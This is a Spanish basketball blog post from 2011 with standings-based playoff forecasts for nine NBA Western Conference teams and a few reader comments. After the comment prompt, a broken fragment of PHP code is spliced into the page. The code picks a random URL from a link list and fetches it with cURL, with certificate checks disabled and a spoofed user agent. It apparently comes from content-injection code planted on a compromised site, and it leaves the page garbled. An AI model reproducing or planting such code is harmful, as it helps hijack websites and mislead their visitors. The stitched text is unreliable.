Autopista hacia los Playoffs 2011: Oeste

26 de March de 2011 por TheDeerHunter

San Antonio Spurs: 57-15 (.792) U10: 6-4.

Restan 5 partidos local y 5 visitante. 8 contra rivales del  Oeste y 2 del Este. 4 contra equipos que no se juegan nada. 1 duelos directos. Calendario difícil.

Sin Duncan la vida ya no es tan maravillosa, por mucho que haya dado la impresión de que el mejor ala-pívot de la historia no ha contribuído tanto este curso a la trayectoria del equipo. Necesitan 5 victorias para asegurar la primera plaza de la regular y la ventaja de campo en todas las eliminatorias que disputen. Se les presenta una racha de partidos de auténtico infierno, @Memphis, Portland, Boston y @Houston, de los que deberían asegurarse al menos un 50% si no quieren ver su posición comprometida. Después un tramo más relajado contra Suns, visita a Atlanta y luego recibir a Sacramento y Utah. Suerte tendrán si el duelo contra Lakers en la penúltima jornada es un trámite.

Pronóstico: 62-20 (.756)

Los Ángeles Lakers: 52-20 (.722) U10: 9-1.

Restan 7 partidos local y 4 visitante. Todos en el Oeste. 4 contra equipos que no se juegan nada. 3 duelos directos. Calendario asequible.

Los campeones han puesto modo anillo: Bynum en el mejor momento de su vida a estas alturas, el mejor Artest del curso, ha vuelto Barnes, Kobe y Pau tienen las espadas afiladas… Da la sensación que están más pendientes de las sensaciones propias que de la clasificación o el balance. Podrían haber quedado primeros de la regular de habérselo propuesto. Veremos si les pasa factura.

Pronóstico: 60-22 (.75)

Dallas Mavericks: 50-21 (.704) U10: 5-5.

Restan 4 partidos local y 7 visitante. Todos en el Oeste. 5 contra equipos que no se juegan nada. 1 duelos directos. Calendario muy difícil.

Inician una gira mortífera por el Oeste que puede terminar con sus aspiraciones de cazar la ventaja campo en la hipotética 2ª ronda. Salir airosos de la gira y, sobretodo, de la visita al Staples podría darles otra perspectiva, pero tiene toda la pinta que se quedarán donde están, que no es moco de pavo.

Pronóstico: 56-26 (.683)

Oklahoma City Thunder: 47-24 (.662) U10: 8-2.

Restan 5 partidos local y 6 visitante. 1 sólo contra Este. 6 contra equipos que no se juegan nada. 1 duelos directos. Calendario cómodo.

A pesar de su grandísimo momento no pasarán a Dallas por la 3ª plaza. Están bien donde están. Difícilmente preferirán una segunda ronda contra Lakers que contra los Spurs. Hay incluso quien los ve como posibles finalistas de conferencia si no vuelve Duncan. A nadie le debería extrañar incluso si vuelve Duncan. Eso sí, antes hay que sacar adelante la primera ronda, que en el oeste no es tema baladí.

Pronóstico: 54-28 (.656)

Denver Nuggets: 44-29 (.603) U10: 7-3.

Restan 4 partidos local y 5 visitante. Todos en el Oeste. 6 contra equipos que no se juegan nada pero 4 gallos. Calendario equilibrado.

Los Nuggets juegan sin presión gracias al trabajo bien hecho y al nivel de exigencia relativo en este proyecto que ahora empieza. 5 partidos sencillos, que les permitirán evitar a Lakers y Spurs, y 4 más en los que tienen posibilidad de lucirse. Tampoco necesitan matarse para defender la plaza y este enfoque, más un calendario más favorable que el de sus rivales permitirá cerrar positivamente la regular. Después que nadie espere un caramelo con ellos en primera ronda.

Pronóstico: 50-32 (.61)

Portland Trail Blazers: 42-30 (.583) U10: 7-3.

Restan 5 partidos local y 5 visitante. Todos en el Oeste. 3 contra equipos que no se juegan nada. 2 duelos directos. Calendario difícil.

El objetivo debe de ser no evitar caer a la 7ª plaza. Respiran aliviados con la lesión de West más la vuelta de Camby, pero aún así se juegan demasiado en la visita a NOLA el 30 de Marzo. Después el calendario apenas afloja. 5 victorias les queda aún por sufrir. Diría que lo lograrán.

Pronóstico: 47-35 (.573)

New Orleans Hornets: 42-31 (.575) U10: 7-3.

Restan 6 partidos local y 3 visitante. 1 sólo contra Este. 3 contra equipos que no se juegan nada. 4 duelos directos. Calendario muy difícil.

Ahora mismo poseen la posición a evitar de entre los clasificados en el Oeste. Mucho me temo que se quedarán con ella si no logran adelantar a Portland ganando la mayoría de los complicados compromisos que les quedan. El primer paso sería vencereles el día 30. Después ya veríamos, porque asegurar 4 victorias más contra Memphis (2), Indiana, Houston, Phoenix, Utah y Dallas, sin West son muchas victorias. De todas formas los Hornets han resucitado tantas veces esta campaña que ya nada nos sorprende.

Pronóstico: 45-37 (.549)

Memphis Grizzlies: 40-33 (.548) U10: 6-4.

Restan 6 partidos local y 3 visitante. Todos en el Oeste. 5 contra equipos que no se juegan nada. 3 duelos directos. Calendario asequible.

Se merecen el premio de Playoffs tras un temporada excelente en la que han mostrado muy buenos picos de juego y le han mojado la cara a más de un ilustre. Su calendario así lo va a ratificar. Los primeros playoffs de Marc. ¿Mejorará el resultado de su hermano en Memphis? Una gran lástima que Gay no sea de la partida.

Pronóstico: 45-37 (.549)

Houston Rockets: 38-34 (.528) U10: 7-3.

Restan 5 partidos local y 5 visitante. 4 contra Este. 4 contra equipos que no se juegan nada. Calendario muy difícil.

Se han matado para lograrlo, y lo hubieran merecido, pero difícilmente van a mantener la racha de los últimos 10 partidos. Esta próxima gira por el Este, comenzando en Miami puede dejarles en el agua. Después deberán seguir desesperadamente en algunos compromisos complicados. Su historia de toda la temporada. Veremos si el año que viene tienen más suerte.

Pronóstico: 43-39 (.524)

Definitivamente Phoenix y Utah están virtualmente fuera. Ojalá vuelvan a estar pronto donde les corresponde, que es disputando eliminatorias.

Comenta

5 comentarios a esta entrada

  1. Vader dice:
    #1

    Lo de que nadie debe esperar que Denver sea un Caramelo va con segundas? XD

    Y por cierto Denver a de tener la misma presion exactamente que cualquier equipo una vez llegados a este punto. Vete a saber el anyo (no tengo enye) que viene si Chandler a renovado con ellos o si Felton sale pq pide el traspaso, si sigue Nene… Vamos que igual tardan en volver a playoff y con tan buen equipo.

    Saludos

      Citar

  2. Sancho88 dice:
    #2

    Alguien sabe por qué la gente de la humilde villa de Milwaukee va con los bulls? mal royo con los jugadores, enternador o algo asi? de estas venganzas royo Vicente Calderon que se une toda la peña para hacer el vacio a sus jugadores? o es simplemente simpatia con Rose? la vedad que nunca lo habia visto en la NBA. Me parece una actitud muy europea

      Citar

  3. the wolf dice:
    #3

    hombre yo creo que la gente iba con los bulls pues porque mucha gente de chicago iria al partido…y es que esta a solo 2 horas en coche…unas 100 milas

      Citar

  4. the wolf dice:
    #4

    que son 160km perdon por no ponerlo es que me he liado…

      Citar

  5. HisRoyalAirness dice:
    #5

    A mì si un tipo de tercer año me hace 30 puntos 17 asistencias en mi propia casa le aplaudo aunque sea el entrenador del equipo rival

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>